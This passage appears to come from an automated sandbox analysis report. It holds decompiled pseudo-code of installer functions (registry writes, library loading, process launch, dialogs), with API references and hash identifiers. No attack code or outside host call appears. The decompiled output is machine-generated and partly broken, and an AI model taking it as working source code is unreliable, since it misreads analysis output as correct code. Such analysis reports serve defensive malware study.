				_t29 = E00405BE9(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BE9(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BE9(_t41, _t47, 0x42a0a0, 0x42a0a0, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a0a0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42e3f8, _a4, 0x42a0a0);
			}



















              0x0040467e
              0x00404683
              0x0040468b
              0x0040468c
              0x00404699
              0x004046a1
              0x004046a2
              0x004046a4
              0x004046a6
              0x004046a8
              0x004046ab
              0x004046ab
              0x004046b2
              0x004046b8
              0x004046b8
              0x004046bf
              0x004046c6
              0x004046c9
              0x004046cc
              0x004046cc
              0x004046d0
              0x004046e0
              0x004046e2
              0x004046e5
              0x0040468e
              0x0040468e
              0x00404695
              0x00404695
              0x004046ed
              0x004046f8
              0x0040470e
              0x0040471e
              0x0040473a

              APIs
              • lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
              • wsprintfA.USER32 ref: 0040471E
              • SetDlgItemTextA.USER32(?,0042A0A0), ref: 00404731
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ItemTextlstrlenwsprintf
              • String ID: %u.%u%s%s
              • API String ID: 3540041739-3551169577
              • Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
              • Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
              • Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
              • Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
              Download Yara Rule
              C-Code - Quality: 51%
              			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405B25();
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












              0x00401bd3
              0x00401bdf
              0x00401be2
              0x00401beb
              0x00401beb
              0x00401bee
              0x00401bf2
              0x00401bfb
              0x00401bfb
              0x00401bfe
              0x00401c02
              0x00401c04
              0x00401c51
              0x00401c53
              0x00401c5c
              0x00401c64
              0x00401c67
              0x00401c67
              0x00401c70
              0x00000000
              0x00401c06
              0x00401c0d
              0x00401c0f
              0x00401c17
              0x00401c1a
              0x00401c42
              0x00401c76
              0x00401c76
              0x00401c1c
              0x00401c2a
              0x00401c32
              0x00401c35
              0x00401c35
              0x00401c1a
              0x00401c79
              0x00401c7c
              0x00401c82
              0x00402866
              0x00402866
              0x004028c1
              0x004028cd

              APIs
              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
              • SendMessageA.USER32 ref: 00401C42
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Timeout
              • String ID: !
              • API String ID: 1777923405-2657877971
              • Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
              • Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
              • Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
              • Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
              Download Yara Rule
              C-Code - Quality: 59%
              			E00401F84(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42ecd8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42eca8 =  *0x42eca8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404EB3(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40b040, 0x409000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004035BA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}








              0x00401f84
              0x00401f84
              0x00401f89
              0x00401f90
              0x0040204c
              0x00402197
              0x00402197
              0x004028be
              0x004028c1
              0x004028cd
              0x004028cd
              0x00401f9f
              0x00401fa9
              0x00401fac
              0x00401fbb
              0x00401fc5
              0x00401fc9
              0x00402045
              0x00000000
              0x00402045
              0x00401fcb
              0x00401fd5
              0x00401fd9
              0x0040201d
              0x00401fdb
              0x00401fde
              0x00401fe1
              0x00402011
              0x00401fe3
              0x00401fe6
              0x00401fef
              0x00401ff1
              0x00401ff1
              0x00401fef
              0x00401fe1
              0x00402025
              0x0040203a
              0x0040203a
              0x00000000
              0x00402025
              0x00401fb5
              0x00401fb9
              0x00000000
              0x00000000
              0x00000000

              APIs
              • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FAF
                • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,?,00007A7E,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,?,00007A7E,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,?,00007A7E), ref: 00404F0F
                • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F47
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F61
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F6F
              • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
              • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401FCF
              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
              • String ID:
              • API String ID: 2987980305-0
              • Opcode ID: 6714c4503f1adaa9a7def2b486d4f4accadca0070fce7f062c20e8e3e2c0112c
              • Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
              • Opcode Fuzzy Hash: 6714c4503f1adaa9a7def2b486d4f4accadca0070fce7f062c20e8e3e2c0112c
              • Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402336, Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
              Download Yara Rule
              C-Code - Quality: 85%
              			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x42ecd0 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a440) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a440 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a440, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a440, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42eca8 =  *0x42eca8 +  *(_t37 - 4);
				return 0;
			}










              0x00402337
              0x0040233c
              0x00402346
              0x00402350
              0x00402353
              0x0040236d
              0x00402374
              0x0040237c
              0x0040238a
              0x0040238e
              0x00402399
              0x00402399
              0x0040239d
              0x004023a1
              0x004023a7
              0x004023ac
              0x004023ac
              0x004023b0
              0x004023bc
              0x004023bc
              0x004023d5
              0x004023d7
              0x004023d7
              0x004023da
              0x004024b0
              0x004024b0
              0x004028c1
              0x004028cd

              APIs
              • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?), ref: 00402374
              • lstrlenA.KERNEL32(0040A440,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402394
              • RegSetValueExA.ADVAPI32(?,?,?,?,0040A440,00000000), ref: 004023CD
              • RegCloseKey.ADVAPI32(?), ref: 004024B0
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseCreateValuelstrlen
              • String ID:
              • API String ID: 1356686001-0
              • Opcode ID: 11898e6dbaa131d38996a6be7a4687239e6c2a1d3939deda226e2690b36420ad
              • Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
              • Opcode Fuzzy Hash: 11898e6dbaa131d38996a6be7a4687239e6c2a1d3939deda226e2690b36420ad
              • Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
              Download Yara Rule
              C-Code - Quality: 67%
              			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b044->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b054 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b05b = 1;
				 *0x40b058 = _t11 & 0x00000001;
				 *0x40b059 = _t11 & 0x00000002;
				 *0x40b05a = _t11 & 0x00000004;
				E00405BE9(_t18, _t24, _t26, 0x40b060,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b044);
				_push(_t14);
				_push(_t26);
				E00405B25();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











              0x00401d46
              0x00401d5f
              0x00401d69
              0x00401d6e
              0x00401d79
              0x00401d80
              0x00401d92
              0x00401d98
              0x00401d9d
              0x00401da7
              0x004024eb
              0x00401561
              0x00402866
              0x004028c1
              0x004028cd

              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CapsCreateDeviceFontIndirect
              • String ID:
              • API String ID: 3272661963-0
              • Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
              • Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
              • Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
              • Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x420c48 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x42ec2c) {
							_t3 = CreateDialogParamA( *0x42ec20, 0x6f, 0, E00402B6E, 0);
							 *0x420c48 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F93(0);
					}
				} else {
					_t6 =  *0x420c48;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420c48 = 0;
					return _t6;
				}
			}






              0x00402bf8
              0x00402c18
              0x00402c22
              0x00402c2e
              0x00402c3f
              0x00402c48
              0x00000000
              0x00402c4d
              0x00402c54
              0x00402c1a
              0x00402c21
              0x00402c21
              0x00402bfa
              0x00402bfa
              0x00402c01
              0x00402c04
              0x00402c04
              0x00402c0a
              0x00402c11
              0x00402c11

              APIs
              • DestroyWindow.USER32 ref: 00402C04
              • GetTickCount.KERNEL32(00000000,00402DD1,00000001), ref: 00402C22
              • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
              • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Window$CountCreateDestroyDialogParamShowTick
              • String ID:
              • API String ID: 2102729457-0
              • Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
              • Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
              • Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
              • Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404E03, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00404E03(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x42a088 != _t22) {
							 *0x42a088 = _t22;
							E00405BC7(0x42a0a0, 0x42f000);
							E00405B25(0x42f000, _t22);
							E0040140B(6);
							E00405BC7(0x42f000, 0x42a0a0);
						}
						L11:
						return CallWindowProcA( *0x42a090, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404782(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403ECF(0x413);
				return 0;
			}




              0x00404e0f
              0x00404e34
              0x00404e54
              0x00404e57
              0x00404e5a
              0x00404e71
              0x00404e77
              0x00404e7e
              0x00404e85
              0x00404e8c
              0x00404e91
              0x00404e97
              0x00000000
              0x00404ea7
              0x00404e41
              0x00404e94
              0x00404e94
              0x00000000
              0x00404e94
              0x00404e4d
              0x00404e4f
              0x00000000
              0x00404e4f
              0x00404e15
              0x00000000
              0x00000000
              0x00404e1c
              0x00000000

              APIs
              • IsWindowVisible.USER32(?), ref: 00404E39
              • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404EA7
                • Part of subcall function 00403ECF: SendMessageA.USER32 ref: 00403EE1
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Window$CallMessageProcSendVisible
              • String ID:
              • API String ID: 3748168415-3916222277
              • Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
              • Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
              • Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
              • Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004058CD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004058CD(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20);
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








              0x004058d1
              0x004058d7
              0x004058d8
              0x004058d8
              0x004058d9
              0x004058e0
              0x004058ea
              0x004058f7
              0x004058fa
              0x00405902
              0x00000000
              0x00000000
              0x00405906
              0x00000000
              0x00000000
              0x00405908
              0x00000000
              0x00405908
              0x00000000

              APIs
              • GetTickCount.KERNEL32(00435400,00435400,00434000,00403128,00435000,00435400,00435400,00435400,00435400,00435400,?,004032B8), ref: 004058E0
              • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 004058FA
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CountFileNameTempTick
              • String ID: nsa
              • API String ID: 1716503409-2209301699
              • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
              • Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
              • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
              • Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405427, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405427(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42c0a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





              0x00405430
              0x0040544c
              0x00405454
              0x00405459
              0x00000000
              0x0040545f
              0x00405463

              APIs
              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
              • CloseHandle.KERNEL32(?), ref: 00405459
              Strings
              • Error launching installer, xrefs: 0040543A
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseCreateHandleProcess
              • String ID: Error launching installer
              • API String ID: 3712363035-66219284
              • Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
              • Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
              • Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
              • Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405813, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405813(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






              0x0040581f
              0x00405821
              0x00405849
              0x0040582e
              0x00405833
              0x0040583e
              0x00000000
              0x0040585b
              0x00405847
              0x00405847
              0x00000000

              APIs
              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
              • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405833
              • CharNextA.USER32(00000000), ref: 00405841
              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: lstrlen$CharNextlstrcmpi
              • String ID:
              • API String ID: 190613189-0
              • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
              • Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
              • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
              • Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB
              Uniqueness

              Uniqueness Score: -1.00%